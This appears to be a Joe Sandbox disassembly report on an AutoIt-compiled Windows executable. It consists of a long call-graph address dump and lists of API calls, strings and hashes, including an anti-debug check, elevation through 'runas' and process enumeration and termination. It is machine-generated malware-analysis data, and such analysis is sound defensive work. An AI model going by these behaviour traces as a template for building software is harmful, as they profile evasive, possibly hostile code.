96628 e2c98d 39 API calls 96626->96628 96629 ea1054 96627->96629 96649 ea1023 ISource 96627->96649 96631 ea0ffc 96628->96631 97113 e3c1f6 96629->97113 96631->96627 96634 e2c98d 39 API calls 96631->96634 96633 e28ec0 52 API calls 96635 ea1069 96633->96635 96636 ea100b 96634->96636 97118 e3f9d4 WideCharToMultiByte 96635->97118 96636->96627 96638 ea1075 inet_addr gethostbyname 96639 ea1093 IcmpCreateFile 96638->96639 96638->96649 96640 ea10d3 96639->96640 96639->96649 96641 e4017b 8 API calls 96640->96641 96642 ea10ec 96641->96642 96643 e2423c 8 API calls 96642->96643 96644 ea10f7 96643->96644 96645 ea112b IcmpSendEcho 96644->96645 96646 ea1102 IcmpSendEcho 96644->96646 96647 ea114c 96645->96647 96646->96647 96648 ea1212 IcmpCloseHandle WSACleanup 96647->96648 96648->96649 96649->96501 96651 eaa6c5 96650->96651 96653 eaa705 96650->96653 96651->96501 96652 eaa723 96652->96651 96655 e2c98d 39 API calls 96652->96655 96656 eaa780 96652->96656 96653->96652 96654 e2c98d 39 API calls 96653->96654 96654->96652 96655->96656 96657 e90372 58 API calls 96656->96657 96657->96651 96659 e28ec0 52 API calls 96658->96659 96660 eaad63 96659->96660 97128 e8dd87 CreateToolhelp32Snapshot Process32FirstW 96660->97128 96662 eaad72 96662->96501 96664 e2c98d 39 API calls 96663->96664 96665 ea186c 96664->96665 96666 e2c98d 39 API calls 96665->96666 96668 ea18a9 96665->96668 96666->96668 96667 ea18cc 96667->96501 96668->96667 96669 e2b4c8 8 API calls 96668->96669 96669->96667 96671 e28ec0 52 API calls 96670->96671 96672 e96662 96671->96672 97196 e8dc54 96672->97196 96674 e9666a 96675 e9666e GetLastError 96674->96675 96676 e96683 96674->96676 96675->96676 96676->96501 96678 ea7b38 96677->96678 96679 ea7b52 96677->96679 97238 e93fe1 81 API calls __wsopen_s 96678->97238 96681 ea60e6 8 API calls 96679->96681 96682 ea7b5d 96681->96682 96683 e30340 206 API calls 96682->96683 96684 ea7bc1 96683->96684 96685 ea7c5c 96684->96685 96688 ea7b4a 96684->96688 96690 ea7c03 96684->96690 96686 ea7c62 
96685->96686 96687 ea7cb0 96685->96687 97239 e91ad8 8 API calls 96686->97239 96687->96688 96689 e28ec0 52 API calls 96687->96689 96688->96463 96691 ea7cc2 96689->96691 96695 e9148b 8 API calls 96690->96695 96693 e2c2c9 8 API calls 96691->96693 96697 ea7ce6 CharUpperBuffW 96693->96697 96694 ea7c85 97240 e2bd07 8 API calls 96694->97240 96696 ea7c3b 96695->96696 96699 e32b20 206 API calls 96696->96699 96700 ea7d00 96697->96700 96699->96688 96701 ea7d53 96700->96701 96702 ea7d07 96700->96702 96703 e28ec0 52 API calls 96701->96703 96706 e9148b 8 API calls 96702->96706 96704 ea7d5b 96703->96704 97241 e3aa65 9 API calls 96704->97241 96707 ea7d35 96706->96707 96708 e32b20 206 API calls 96707->96708 96708->96688 96709 ea7d65 96709->96688 96710 e28ec0 52 API calls 96709->96710 96711 ea7d80 96710->96711 97242 e2bd07 8 API calls 96711->97242 96713->96502 96714->96461 96716 e2b338 _wcslen 96715->96716 96717 e4017b 8 API calls 96716->96717 96718 e2b360 __fread_nolock 96717->96718 96719 e4014b 8 API calls 96718->96719 96720 e2b376 96719->96720 96720->96475 96721->96464 96722->96487 96723->96492 96724->96501 96725->96501 96726->96501 96727->96499 96728->96501 96729->96572 96730->96569 96731->96574 96732->96576 96734 e28ec0 52 API calls 96733->96734 96735 ea89ed 96734->96735 96757 ea8a32 ISource 96735->96757 96771 ea9730 96735->96771 96737 ea8cde 96738 ea8eac 96737->96738 96743 ea8cec 96737->96743 96820 ea9941 59 API calls 96738->96820 96741 ea8ebb 96741->96743 96744 ea8ec7 96741->96744 96742 e28ec0 52 API calls 96761 ea8aa6 96742->96761 96784 ea88e3 96743->96784 96744->96757 96749 ea8d25 96798 e3ffe0 96749->96798 96752 ea8d5f 96806 e27e12 96752->96806 96753 ea8d45 96805 e93fe1 81 API calls __wsopen_s 96753->96805 96756 ea8d50 GetCurrentProcess TerminateProcess 96756->96752 96757->96579 96761->96737 96761->96742 96761->96757 96803 e84ad3 8 API calls __fread_nolock 96761->96803 96804 ea8f7a 41 API calls _strftime 96761->96804 96762 ea8f22 96762->96757 96767 ea8f36 FreeLibrary 
96762->96767 96764 ea8d9e 96818 ea95d8 74 API calls 96764->96818 96767->96757 96769 e2b4c8 8 API calls 96770 ea8daf 96769->96770 96770->96762 96770->96769 96819 e31ca0 8 API calls 96770->96819 96821 ea95d8 74 API calls 96770->96821 96822 e2c2c9 96771->96822 96773 ea974b CharLowerBuffW 96828 e89805 96773->96828 96780 ea979b 96852 e2adf4 96780->96852 96782 ea98bb _wcslen 96782->96761 96783 ea97a5 _wcslen 96783->96782 96856 ea8f7a 41 API calls _strftime 96783->96856 96785 ea8949 96784->96785 96786 ea88fe 96784->96786 96790 ea9af3 96785->96790 96787 e4017b 8 API calls 96786->96787 96788 ea8920 96787->96788 96788->96785 96789 e4014b 8 API calls 96788->96789 96789->96788 96791 ea9d08 ISource 96790->96791 96795 ea9b17 _strcat _wcslen ___std_exception_copy 96790->96795 96791->96749 96792 e2ca5b 39 API calls 96792->96795 96793 e2c98d 39 API calls 96793->96795 96794 e2c63f 39 API calls 96794->96795 96795->96791 96795->96792 96795->96793 96795->96794 96796 e28ec0 52 API calls 96795->96796 96860 e8f8c5 10 API calls _wcslen 96795->96860 96796->96795 96800 e3fff5 96798->96800 96799 e4008d Sleep 96801 e4005b 96799->96801 96800->96799 96800->96801 96802 e4007b CloseHandle 96800->96802 96801->96752 96801->96753 96802->96801 96803->96761 96804->96761 96805->96756 96807 e27e1a 96806->96807 96808 e4014b 8 API calls 96807->96808 96809 e27e28 96808->96809 96861 e28445 96809->96861 96812 e28470 96864 e2c760 96812->96864 96814 e4017b 8 API calls 96816 e2851c 96814->96816 96815 e28480 96815->96814 96815->96816 96816->96770 96817 e31ca0 8 API calls 96816->96817 96817->96764 96818->96770 96819->96770 96820->96741 96821->96770 96823 e2c2d9 __fread_nolock 96822->96823 96824 e2c2dc 96822->96824 96823->96773 96825 e4014b 8 API calls 96824->96825 96826 e2c2e7 96825->96826 96827 e4017b 8 API calls 96826->96827 96827->96823 96830 e89825 _wcslen 96828->96830 96829 e89914 96829->96783 96835 e2bf73 96829->96835 96830->96829 96831 e8985a 96830->96831 96834 e89919 96830->96834 96831->96829 96857 e3e36b 
41 API calls 96831->96857 96834->96829 96858 e3e36b 41 API calls 96834->96858 96836 e4017b 8 API calls 96835->96836 96837 e2bf88 96836->96837 96838 e4014b 8 API calls 96837->96838 96839 e2bf96 96838->96839 96840 e2acc0 96839->96840 96843 e2ace1 96840->96843 96851 e2accf 96840->96851 96841 e2acda __fread_nolock 96841->96780 96842 e2c2c9 8 API calls 96844 e705a3 __fread_nolock 96842->96844 96845 e70557 96843->96845 96846 e2ad07 96843->96846 96843->96851 96848 e4014b 8 API calls 96845->96848 96859 e288e8 8 API calls 96846->96859 96849 e70561 96848->96849 96850 e4017b 8 API calls 96849->96850 96850->96851 96851->96841 96851->96842 96853 e2ae02 96852->96853 96854 e2ae0b __fread_nolock 96852->96854 96853->96854 96855 e2c2c9 8 API calls 96853->96855 96854->96783 96854->96854 96855->96854 96856->96782 96857->96831 96858->96834 96859->96841 96860->96795 96862 e4014b 8 API calls 96861->96862 96863 e27e30 96862->96863 96863->96812 96865 e2c76b 96864->96865 96866 e71285 96865->96866 96871 e2c773 ISource 96865->96871 96867 e4014b 8 API calls 96866->96867 96869 e71291 96867->96869 96868 e2c77a 96868->96815 96871->96868 96872 e2c7e0 8 API calls ISource 96871->96872 96872->96871 96874 e918b6 96873->96874 96875 e4014b 8 API calls 96874->96875 96876 e918bd 96875->96876 96879 e8fcb5 96876->96879 96878 e918f7 96878->96585 96880 e2c2c9 8 API calls 96879->96880 96881 e8fcc8 CharLowerBuffW 96880->96881 96887 e8fcdb 96881->96887 96882 e8fce5 ___scrt_fastfail 96882->96878 96883 e8fd19 96885 e8fd2b 96883->96885 96912 e2655e 96883->96912 96884 e2655e 8 API calls 96884->96887 96886 e4017b 8 API calls 96885->96886 96889 e8fd59 96886->96889 96887->96882 96887->96883 96887->96884 96890 e8fd7b 96889->96890 96915 e8fbed 8 API calls 96889->96915 96897 e8fe0c 96890->96897 96893 e8fdb8 96893->96882 96894 e4014b 8 API calls 96893->96894 96895 e8fdd2 96894->96895 96896 e4017b 8 API calls 96895->96896 96896->96882 96898 e2bf73 8 API calls 96897->96898 96899 e8fe3e 96898->96899 96900 e2bf73 8 API calls 
96899->96900 96901 e8fe47 96900->96901 96902 e2bf73 8 API calls 96901->96902 96910 e8fe50 96902->96910 96903 e28577 8 API calls 96903->96910 96904 e90114 96904->96893 96905 e466f8 GetStringTypeW 96905->96910 96907 e46641 39 API calls 96907->96910 96908 e8fe0c 40 API calls 96908->96910 96909 e2ad40 8 API calls 96909->96910 96910->96903 96910->96904 96910->96905 96910->96907 96910->96908 96910->96909 96911 e2bed9 8 API calls 96910->96911 96916 e46722 GetStringTypeW _strftime 96910->96916 96911->96910 96913 e2c2c9 8 API calls 96912->96913 96914 e26569 96913->96914 96914->96885 96915->96889 96916->96910 96954 e902aa 96917->96954 96920 e9040b 96923 e90471 96920->96923 96926 e9041b 96920->96926 96921 e903f3 96970 e905e9 56 API calls __fread_nolock 96921->96970 96924 e904a1 96923->96924 96925 e90507 96923->96925 96942 e90399 __fread_nolock 96923->96942 96927 e904d1 96924->96927 96928 e904a6 96924->96928 96929 e905b0 96925->96929 96930 e90510 96925->96930 96931 e90453 96926->96931 96971 e92855 10 API calls 96926->96971 96927->96942 96975 e2ca5b 39 API calls 96927->96975 96928->96942 96974 e2ca5b 39 API calls 96928->96974 96929->96942 96979 e2c63f 39 API calls 96929->96979 96932 e9058d 96930->96932 96933 e90515 96930->96933 96961 e91844 96931->96961 96932->96942 96978 e2c63f 39 API calls 96932->96978 96938 e9051b 96933->96938 96939 e90554 96933->96939 96938->96942 96976 e2c63f 39 API calls 96938->96976 96939->96942 96977 e2c63f 39 API calls 96939->96977 96942->96596 96945 e90427 96972 e92855 10 API calls 96945->96972 96947 e9043e __fread_nolock 96973 e92855 10 API calls 96947->96973 96950 e2c99e 96949->96950 96951 e2c9a5 96949->96951 96950->96951 96993 e46641 39 API calls _strftime 96950->96993 96951->96590 96953 e2c9e8 96953->96590 96955 e902f7 96954->96955 96959 e902bb 96954->96959 96957 e2c98d 39 API calls 96955->96957 96956 e902f5 96956->96920 96956->96921 96956->96942 96957->96956 96958 e28ec0 52 API calls 96958->96959 96959->96956 96959->96958 96980 e44d98 
96959->96980 96962 e9184f 96961->96962 96963 e4014b 8 API calls 96962->96963 96964 e91856 96963->96964 96965 e91883 96964->96965 96966 e91862 96964->96966 96967 e4017b 8 API calls 96965->96967 96968 e4017b 8 API calls 96966->96968 96969 e9186b ___scrt_fastfail 96967->96969 96968->96969 96969->96942 96970->96942 96971->96945 96972->96947 96973->96931 96974->96942 96975->96942 96976->96942 96977->96942 96978->96942 96979->96942 96981 e44da6 96980->96981 96982 e44e1b 96980->96982 96989 e44dcb 96981->96989 96990 e4f649 20 API calls _free 96981->96990 96992 e44e2d 40 API calls 4 library calls 96982->96992 96985 e44e28 96985->96959 96986 e44db2 96991 e52b5c 26 API calls _abort 96986->96991 96988 e44dbd 96988->96959 96989->96959 96990->96986 96991->96988 96992->96985 96993->96953 96995 e4014b 8 API calls 96994->96995 96996 e2424e 96995->96996 96996->96602 96997->96605 96999 e23996 ___scrt_fastfail 96998->96999 97031 e25f32 96999->97031 97002 e23a1c 97004 e23a3a Shell_NotifyIconW 97002->97004 97005 e640cd Shell_NotifyIconW 97002->97005 97035 e261a9 97004->97035 97007 e23a50 97007->96612 97009 e23969 97008->97009 97010 e23919 ___scrt_fastfail 97008->97010 97009->96612 97011 e23938 Shell_NotifyIconW 97010->97011 97011->97009 97013 e4017b 8 API calls 97012->97013 97014 e27afa 97013->97014 97015 e4014b 8 API calls 97014->97015 97016 e27b08 97015->97016 97016->96612 97017->96612 97018->96612 97020 e28587 _wcslen 97019->97020 97021 e66610 97019->97021 97024 e285c2 97020->97024 97025 e2859d 97020->97025 97022 e2adf4 8 API calls 97021->97022 97023 e66619 97022->97023 97023->97023 97027 e4014b 8 API calls 97024->97027 97112 e288e8 8 API calls 97025->97112 97029 e285ce 97027->97029 97028 e285a5 __fread_nolock 97028->96612 97030 e4017b 8 API calls 97029->97030 97030->97028 97032 e239eb 97031->97032 97033 e25f4e 97031->97033 97032->97002 97065 e8d11f 42 API calls _strftime 97032->97065 97033->97032 97034 e65070 DestroyIcon 97033->97034 97034->97032 97036 e261c6 97035->97036 97054 
e262a8 97035->97054 97037 e27ad5 8 API calls 97036->97037 97038 e261d4 97037->97038 97039 e261e1 97038->97039 97040 e65278 LoadStringW 97038->97040 97041 e28577 8 API calls 97039->97041 97043 e65292 97040->97043 97042 e261f6 97041->97042 97044 e26203 97042->97044 97045 e652ae 97042->97045 97047 e2bed9 8 API calls 97043->97047 97064 e26229 ___scrt_fastfail 97043->97064 97044->97043 97046 e2620d 97044->97046 97051 e652f1 97045->97051 97053 e2bf73 8 API calls 97045->97053 97045->97064 97066 e26b7c 97046->97066 97047->97064 97085 e3fe6f 51 API calls 97051->97085 97052 e2628e Shell_NotifyIconW 97052->97054 97055 e652d8 97053->97055 97054->97007 97084 e8a350 9 API calls 97055->97084 97058 e65310 97060 e26b7c 8 API calls 97058->97060 97059 e652e3 97061 e27bb5 8 API calls 97059->97061 97062 e65321 97060->97062 97061->97051 97063 e26b7c 8 API calls 97062->97063 97063->97064 97064->97052 97065->97002 97067 e26b93 97066->97067 97068 e657fe 97066->97068 97086 e26ba4 97067->97086 97070 e4014b 8 API calls 97068->97070 97072 e65808 _wcslen 97070->97072 97071 e2621b 97075 e27bb5 97071->97075 97073 e4017b 8 API calls 97072->97073 97074 e65841 __fread_nolock 97073->97074 97076 e27bc7 97075->97076 97077 e6641d 97075->97077 97101 e27bd8 97076->97101 97111 e813c8 8 API calls __fread_nolock 97077->97111 97080 e27bd3 97080->97064 97081 e66427 97082 e2bed9 8 API calls 97081->97082 97083 e66433 97081->97083 97082->97083 97084->97059 97085->97058 97087 e26bb4 _wcslen 97086->97087 97088 e26bc7 97087->97088 97089 e65860 97087->97089 97096 e27d74 97088->97096 97090 e4014b 8 API calls 97089->97090 97092 e6586a 97090->97092 97094 e4017b 8 API calls 97092->97094 97093 e26bd4 __fread_nolock 97093->97071 97095 e6589a __fread_nolock 97094->97095 97097 e27d8a 97096->97097 97100 e27d85 __fread_nolock 97096->97100 97098 e4017b 8 API calls 97097->97098 97099 e66528 97097->97099 97098->97100 97099->97099 97100->97093 97102 e27be7 97101->97102 97108 e27c1b __fread_nolock 97101->97108 97103 e6644e 
97102->97103 97104 e27c0e 97102->97104 97102->97108 97105 e4014b 8 API calls 97103->97105 97106 e27d74 8 API calls 97104->97106 97107 e6645d 97105->97107 97106->97108 97109 e4017b 8 API calls 97107->97109 97108->97080 97110 e66491 __fread_nolock 97109->97110 97111->97081 97112->97028 97114 e4017b 8 API calls 97113->97114 97115 e3c209 97114->97115 97116 e4014b 8 API calls 97115->97116 97117 e3c215 97116->97117 97117->96633 97119 e3fa35 97118->97119 97120 e3f9fe 97118->97120 97127 e3fe8a 8 API calls 97119->97127 97122 e4017b 8 API calls 97120->97122 97123 e3fa05 WideCharToMultiByte 97122->97123 97126 e3fa3e 8 API calls __fread_nolock 97123->97126 97125 e3fa29 97125->96638 97126->97125 97127->97125 97138 e8e80e 97128->97138 97130 e8ddd4 Process32NextW 97131 e8de86 CloseHandle 97130->97131 97137 e8ddcd 97130->97137 97131->96662 97132 e2bf73 8 API calls 97132->97137 97133 e2b329 8 API calls 97133->97137 97135 e27bb5 8 API calls 97135->97137 97137->97130 97137->97131 97137->97132 97137->97133 97137->97135 97144 e2568e 97137->97144 97186 e3e36b 41 API calls 97137->97186 97139 e8e819 97138->97139 97140 e8e830 97139->97140 97143 e8e836 97139->97143 97187 e46722 GetStringTypeW _strftime 97139->97187 97188 e4666b 39 API calls _strftime 97140->97188 97143->97137 97145 e2bf73 8 API calls 97144->97145 97146 e256a4 97145->97146 97147 e2bf73 8 API calls 97146->97147 97148 e256ac 97147->97148 97149 e2bf73 8 API calls 97148->97149 97150 e256b4 97149->97150 97151 e2bf73 8 API calls 97150->97151 97152 e256bc 97151->97152 97153 e256f0 97152->97153 97154 e64da1 97152->97154 97156 e2acc0 8 API calls 97153->97156 97155 e2bed9 8 API calls 97154->97155 97157 e64daa 97155->97157 97158 e256fe 97156->97158 97189 e2bd57 97157->97189 97160 e2adf4 8 API calls 97158->97160 97161 e25708 97160->97161 97162 e2acc0 8 API calls 97161->97162 97163 e25733 97161->97163 97164 e25729 97162->97164 97165 e25754 97163->97165 97176 e64dcc 97163->97176 97179 e25778 97163->97179 97167 e2adf4 8 API calls 
98554->98565 98556 e59519 98557 e4dcc5 __fread_nolock 26 API calls 98556->98557 98556->98559 98558 e59545 98557->98558 98558->98559 98560 e4dcc5 __fread_nolock 26 API calls 98558->98560 98561 e59553 98560->98561 98561->98559 98562 e4dcc5 __fread_nolock 26 API calls 98561->98562 98563 e59563 98562->98563 98564 e4dcc5 __fread_nolock 26 API calls 98563->98564 98564->98559 98566 e58fbe ___DestructExceptionObject 98565->98566 98567 e58fc6 98566->98567 98568 e58fde 98566->98568 98599 e4f636 20 API calls _free 98567->98599 98570 e590a4 98568->98570 98575 e59017 98568->98575 98606 e4f636 20 API calls _free 98570->98606 98572 e58fcb 98600 e4f649 20 API calls _free 98572->98600 98573 e590a9 98607 e4f649 20 API calls _free 98573->98607 98577 e59026 98575->98577 98578 e5903b 98575->98578 98601 e4f636 20 API calls _free 98577->98601 98598 e554ba EnterCriticalSection 98578->98598 98580 e59033 98608 e52b5c 26 API calls _abort 98580->98608 98582 e5902b 98602 e4f649 20 API calls _free 98582->98602 98583 e59041 98585 e59072 98583->98585 98586 e5905d 98583->98586 98590 e590c5 __fread_nolock 38 API calls 98585->98590 98603 e4f649 20 API calls _free 98586->98603 98588 e58fd3 __wsopen_s 98588->98556 98592 e5906d 98590->98592 98591 e59062 98604 e4f636 20 API calls _free 98591->98604 98605 e5909c LeaveCriticalSection __wsopen_s 98592->98605 98595->98548 98596->98559 98597->98551 98598->98583 98599->98572 98600->98588 98601->98582 98602->98580 98603->98591 98604->98592 98605->98588 98606->98573 98607->98580 98608->98588 98609 e2dd3d 98610 e2dd63 98609->98610 98611 e719c2 98609->98611 98612 e2dead 98610->98612 98615 e4014b 8 API calls 98610->98615 98614 e71a82 98611->98614 98619 e71a26 98611->98619 98622 e71a46 98611->98622 98616 e4017b 8 API calls 98612->98616 98669 e93fe1 81 API calls __wsopen_s 98614->98669 98621 e2dd8d 98615->98621 98628 e2dee4 __fread_nolock 98616->98628 98617 e71a7d 98667 e3e6e8 207 API calls 98619->98667 98623 e4014b 8 API calls 98621->98623 98621->98628 98622->98617 
98668 e93fe1 81 API calls __wsopen_s 98622->98668 98624 e2dddb 98623->98624 98624->98619 98626 e2de16 98624->98626 98625 e4017b 8 API calls 98625->98628 98627 e30340 207 API calls 98626->98627 98629 e2de29 98627->98629 98628->98622 98628->98625 98629->98617 98629->98628 98630 e71aa5 98629->98630 98631 e2de77 98629->98631 98633 e2d526 98629->98633 98670 e93fe1 81 API calls __wsopen_s 98630->98670 98631->98612 98631->98633 98634 e4014b 8 API calls 98633->98634 98635 e2d589 98634->98635 98651 e2c32d 98635->98651 98638 e4014b 8 API calls 98642 e2d66e ISource 98638->98642 98640 e2b4c8 8 API calls 98640->98642 98642->98640 98643 e71f79 98642->98643 98644 e71f94 98642->98644 98646 e2bed9 8 API calls 98642->98646 98647 e2c3ab 8 API calls 98642->98647 98648 e2d911 ISource 98642->98648 98671 e856ae 8 API calls ISource 98643->98671 98646->98642 98647->98642 98649 e2d9ac ISource 98648->98649 98658 e2c3ab 98648->98658 98650 e2d9c3 98649->98650 98666 e3e30a 8 API calls ISource 98649->98666 98654 e2c33d 98651->98654 98652 e2c345 98652->98638 98653 e4014b 8 API calls 98653->98654 98654->98652 98654->98653 98655 e2bf73 8 API calls 98654->98655 98656 e2c32d 8 API calls 98654->98656 98657 e2bed9 8 API calls 98654->98657 98655->98654 98656->98654 98657->98654 98659 e2c3b9 98658->98659 98665 e2c3e1 ISource 98658->98665 98660 e2c3c7 98659->98660 98661 e2c3ab 8 API calls 98659->98661 98662 e2c3cd 98660->98662 98663 e2c3ab 8 API calls 98660->98663 98661->98660 98662->98665 98672 e2c7e0 8 API calls ISource 98662->98672 98663->98662 98665->98649 98666->98649 98667->98622 98668->98617 98669->98617 98670->98617 98671->98644 98672->98665 99233 e3235c 99234 e32365 __fread_nolock 99233->99234 99235 e28ec0 52 API calls 99234->99235 99236 e774e3 99234->99236 99239 e323b6 99234->99239 99240 e4014b 8 API calls 99234->99240 99243 e31ff7 __fread_nolock 99234->99243 99244 e4017b 8 API calls 99234->99244 99235->99234 99245 e813c8 8 API calls __fread_nolock 99236->99245 99238 e774ef 99242 e2bed9 8 API 
calls 99238->99242 99238->99243 99241 e27d74 8 API calls 99239->99241 99240->99234 99241->99243 99242->99243 99244->99234 99245->99238

Control-flow Graph

[Figure: control-flow graph of function e25fc8-e26037; legend: Executed, Not Executed]
APIs
• GetVersionExW.KERNEL32(?), ref: 00E25FF7
  • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
• GetCurrentProcess.KERNEL32(?,00EBDC2C,00000000,?,?), ref: 00E26123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00E2612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E26155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E26167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00E26175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00E2617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00E261A1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 4e28b761130e29a5c2c233e3f73a02506e6d45ba64f31fb91990e679782629c6
• Instruction ID: e9dd87bae5611a2a656f6a7bbfacaaa09ae241560786d1675b2ef6797e4f22d2
• Opcode Fuzzy Hash: 4e28b761130e29a5c2c233e3f73a02506e6d45ba64f31fb91990e679782629c6
• Instruction Fuzzy Hash: 9CA1D4B294B2D6CFC711CB6A7C411F53FA46BA6344F0869ADD284B3222D32D494CCB31

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E23368,?), ref: 00E233BB
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E23368,?), ref: 00E233CE
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EF2418,00EF2400,?,?,?,?,?,?,00E23368,?), ref: 00E2343A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E23462,00EF2418,?,?,?,?,?,?,?,00E23368,?), ref: 00E242A0
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00EF2418,?,?,?,?,?,?,?,00E23368,?), ref: 00E234BB
                                                                                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E63CB0
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00EF2418,?,?,?,?,?,?,?,00E23368,?), ref: 00E63CF1
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EE31F4,00EF2418,?,?,?,?,?,?,?,00E23368), ref: 00E63D7A
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E63D81
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: GetSysColorBrush.USER32(0000000F), ref: 00E234DE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadCursorW.USER32(00000000,00007F00), ref: 00E234ED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadIconW.USER32(00000063), ref: 00E23503
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadIconW.USER32(000000A4), ref: 00E23515
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadIconW.USER32(000000A2), ref: 00E23527
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E2353F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E234D3: RegisterClassExW.USER32(?), ref: 00E23590
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E235B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E235E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E235B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E23602
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E23368,?), ref: 00E23616
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E23368,?), ref: 00E2361F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E23A3C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • AutoIt, xrefs: 00E63CA5
                                                                                                                                                                                                                                                                                                    • runas, xrefs: 00E63D75
                                                                                                                                                                                                                                                                                                    • 0$, xrefs: 00E23495
                                                                                                                                                                                                                                                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E63CAA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                    • String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                                    • API String ID: 683915450-3328958999
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9122f370577803baabdf0bc40a6bd7dd62422c9a7618d8b6f6fdb93be2470384
                                                                                                                                                                                                                                                                                                    • Instruction ID: f2e213b9317ae81a7156bfe6bccf8155d3bbf13cac461b66fd9e4ead2bb6bb79
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9122f370577803baabdf0bc40a6bd7dd62422c9a7618d8b6f6fdb93be2470384
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3651E371248355AED701FF71BC019BA7BE8ABD4744F00252CF6A2761A2DB648A4DDB22

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E255D1,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E25871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8EAB0: GetFileAttributesW.KERNEL32(?,00E8D840), ref: 00E8EAB1
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E8DCCB
